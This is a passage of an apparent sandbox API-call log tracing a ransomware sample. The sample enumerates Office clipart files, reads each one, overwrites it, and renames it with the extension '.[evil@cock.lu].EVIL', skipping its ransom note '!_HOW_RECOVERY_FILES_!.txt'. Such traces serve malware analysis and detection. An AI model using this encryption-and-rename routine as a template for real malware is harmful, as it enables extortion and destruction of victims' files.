_File=0x7ffc020ee2a0) returned 0 [0168.969] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00333_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00333_.wmf.[evil@cock.lu].evil")) returned 1 [0168.970] ??_V@YAXPEAX@Z () returned 0x1 [0168.972] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF", dwFileAttributes=0x200) returned 0 [0168.973] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.973] wcsstr (_Str="SO00345_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.973] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF") returned 69 [0168.973] wcscmp (_String1="SO00345_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.973] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00345_.WMF") returned 0x0 [0168.973] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF") returned 0x45 [0168.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00345_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.976] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b96, lpOverlapped=0x0) returned 1 [0168.983] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.983] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.983] _errno () returned 0x84b1160840 [0168.983] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.983] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x8ba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8ba0, lpOverlapped=0x0) returned 1 [0168.983] CloseHandle (hObject=0x1a8) returned 1 [0168.983] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.983] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.983] __uncaught_exception () returned 0x84b1160800 [0168.983] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.984] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00345_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00345_.wmf.[evil@cock.lu].evil")) returned 1 [0168.985] ??_V@YAXPEAX@Z () returned 0x1 [0168.987] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF", dwFileAttributes=0x200) returned 0 [0168.988] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.988] wcsstr (_Str="SO00350_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.988] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF") returned 69 [0168.988] wcscmp (_String1="SO00350_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.988] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00350_.WMF") returned 0x0 [0168.988] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF") returned 0x45 [0168.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00350_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.990] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbbe0, lpOverlapped=0x0) returned 1 [0168.997] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.997] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.997] _errno () returned 0x84b1160840 [0168.997] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.997] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbc00, lpOverlapped=0x0) returned 1 [0168.998] CloseHandle (hObject=0x1a8) returned 1 [0168.998] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.998] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.998] __uncaught_exception () returned 0x84b1160800 [0168.998] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00350_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00350_.wmf.[evil@cock.lu].evil")) returned 1 [0168.999] ??_V@YAXPEAX@Z () returned 0x1 [0169.002] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF", dwFileAttributes=0x200) returned 0 [0169.002] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.002] wcsstr (_Str="SO00352_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.002] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF") returned 69 [0169.002] wcscmp (_String1="SO00352_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.002] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00352_.WMF") returned 0x0 [0169.002] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF") returned 0x45 [0169.002] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00352_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.004] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x934c, lpOverlapped=0x0) returned 1 [0169.013] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.013] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.013] _errno () returned 0x84b1160840 [0169.013] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.013] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x9360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9360, lpOverlapped=0x0) returned 1 [0169.013] CloseHandle (hObject=0x1a8) returned 1 [0169.013] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.014] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.014] __uncaught_exception () returned 0x84b1160800 [0169.014] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.014] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00352_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00352_.wmf.[evil@cock.lu].evil")) returned 1 [0169.015] ??_V@YAXPEAX@Z () returned 0x1 [0169.018] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF", dwFileAttributes=0x200) returned 0 [0169.018] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.018] wcsstr (_Str="SO00364_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.018] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF") returned 69 [0169.018] wcscmp (_String1="SO00364_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.018] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00364_.WMF") returned 0x0 [0169.018] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF") returned 0x45 [0169.018] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00364_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.021] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1948, lpOverlapped=0x0) returned 1 [0169.028] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.028] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.028] _errno () returned 0x84b1160840 [0169.028] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.028] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1960, lpOverlapped=0x0) returned 1 [0169.028] CloseHandle (hObject=0x1a8) returned 1 [0169.028] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.028] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.028] __uncaught_exception () returned 0x84b1160800 [0169.028] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.029] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00364_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00364_.wmf.[evil@cock.lu].evil")) returned 1 [0169.029] ??_V@YAXPEAX@Z () returned 0x1 [0169.032] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF", dwFileAttributes=0x200) returned 0 [0169.033] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.033] wcsstr (_Str="SO00367_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.033] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF") returned 69 [0169.033] wcscmp (_String1="SO00367_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.033] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00367_.WMF") returned 0x0 [0169.033] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF") returned 0x45 [0169.033] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00367_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.035] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x51ea, lpOverlapped=0x0) returned 1 [0169.044] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.044] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.044] _errno () returned 0x84b1160840 [0169.044] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.044] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5200, lpOverlapped=0x0) returned 1 [0169.044] CloseHandle (hObject=0x1a8) returned 1 [0169.044] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.044] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.044] __uncaught_exception () returned 0x84b1160800 [0169.044] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.045] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00367_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00367_.wmf.[evil@cock.lu].evil")) returned 1 [0169.046] ??_V@YAXPEAX@Z () returned 0x1 [0169.048] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF", dwFileAttributes=0x200) returned 0 [0169.049] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.049] wcsstr (_Str="SO00373_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.049] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF") returned 69 [0169.049] wcscmp (_String1="SO00373_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.049] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00373_.WMF") returned 0x0 [0169.049] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF") returned 0x45 [0169.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00373_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.051] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3308, lpOverlapped=0x0) returned 1 [0169.057] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.057] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.057] _errno () returned 0x84b1160840 [0169.058] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.058] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x3320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3320, lpOverlapped=0x0) returned 1 [0169.058] CloseHandle (hObject=0x1a8) returned 1 [0169.058] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.058] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.058] __uncaught_exception () returned 0x84b1160800 [0169.058] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.058] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00373_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00373_.wmf.[evil@cock.lu].evil")) returned 1 [0169.059] ??_V@YAXPEAX@Z () returned 0x1 [0169.062] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF", dwFileAttributes=0x200) returned 0 [0169.062] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.062] wcsstr (_Str="SO00382_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.062] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF") returned 69 [0169.062] wcscmp (_String1="SO00382_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.062] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00382_.WMF") returned 0x0 [0169.062] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF") returned 0x45 [0169.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00382_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.064] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27f4, lpOverlapped=0x0) returned 1 [0169.071] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.071] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.071] _errno () returned 0x84b1160840 [0169.071] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.071] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2800, lpOverlapped=0x0) returned 1 [0169.071] CloseHandle (hObject=0x1a8) returned 1 [0169.071] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.072] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.072] __uncaught_exception () returned 0x84b1160800 [0169.072] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.072] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00382_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00382_.wmf.[evil@cock.lu].evil")) returned 1 [0169.073] ??_V@YAXPEAX@Z () returned 0x1 [0169.075] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF", dwFileAttributes=0x200) returned 0 [0169.076] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.076] wcsstr (_Str="SO00390_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.076] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF") returned 69 [0169.076] wcscmp (_String1="SO00390_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.076] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00390_.WMF") returned 0x0 [0169.076] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF") returned 0x45 [0169.076] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.078] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb7c, lpOverlapped=0x0) returned 1 [0169.085] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.085] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.085] _errno () returned 0x84b1160840 [0169.085] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.085] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb80, lpOverlapped=0x0) returned 1 [0169.085] CloseHandle (hObject=0x1a8) returned 1 [0169.085] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.086] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.086] __uncaught_exception () returned 0x84b1160800 [0169.086] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.086] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00390_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00390_.wmf.[evil@cock.lu].evil")) returned 1 